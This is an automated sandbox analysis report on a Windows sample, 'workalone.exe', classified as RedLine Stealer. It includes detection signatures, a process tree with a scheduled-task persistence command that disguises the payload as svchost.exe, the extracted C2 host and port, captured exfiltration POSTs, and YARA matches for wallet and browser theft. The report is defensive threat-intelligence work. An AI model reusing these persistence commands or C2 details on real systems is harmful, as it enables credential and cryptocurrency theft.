Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
workalone.exe

Overview

General Information

Sample Name:workalone.exe
Analysis ID:756291
MD5:68f42f485ece93306bef1e4084d3052e
SHA1:c63f1a56d12a0acbf5e9a354d8a66c6e17af2309
SHA256:5d526be000146cf9cf94f7ef6f4e86929d508e17ca483b03d4ecbd2d52e071c9
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Tries to steal Crypto Currency Wallets
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • workalone.exe (PID: 5836 cmdline: C:\Users\user\Desktop\workalone.exe MD5: 68F42F485ECE93306BEF1E4084D3052E)
    • workalone.exe (PID: 5956 cmdline: C:\Users\user\Desktop\workalone.exe MD5: 68F42F485ECE93306BEF1E4084D3052E)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5972 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6040 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6108 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 6080 cmdline: cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["saleshor12.duckdns.org:46539"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.0.workalone.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                1.0.workalone.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  1.0.workalone.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165fe:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165df:$v2_6: GetUpdates
                  1.0.workalone.exe.400000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
                  0.2.workalone.exe.3a29170.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Schedule system process
                    Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\workalone.exe, ParentImage: C:\Users\user\Desktop\workalone.exe, ParentProcessId: 5836, ParentProcessName: workalone.exe, ProcessCommandLine: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, ProcessId: 6040, ProcessName: cmd.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: workalone.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeAvira: detection malicious, Label: HEUR/AGEN.1235903
                    Machine Learning detection for sample
                    Source: workalone.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeJoe Sandbox ML: detected
                    Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": ["saleshor12.duckdns.org:46539"], "Bot Id": "cheat"}
                    Source: workalone.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: workalone.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 85.208.136.178 ports 46539,3,4,5,6,9
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49688
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49688
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: saleshor12.duckdns.org:46539
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: saleshor12.duckdns.org
                    Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: saleshor12.duckdns.org:46539Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: saleshor12.duckdns.org:46539Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: saleshor12.duckdns.org:46539Content-Length: 1144458Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: saleshor12.duckdns.org:46539Content-Length: 1144450Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.3:49685 -> 85.208.136.178:46539
                    Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
                    Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                    Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://saleshor12.duckdns.org
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://saleshor12.duckdns.org:
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://saleshor12.duckdns.org:46539
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://saleshor12.duckdns.org:46539/
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/t_
                    Source: tmp1B56.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmp1B56.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmp1B56.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmp1B56.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: saleshor12.duckdns.org:46539Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: saleshor12.duckdns.org

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: workalone.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
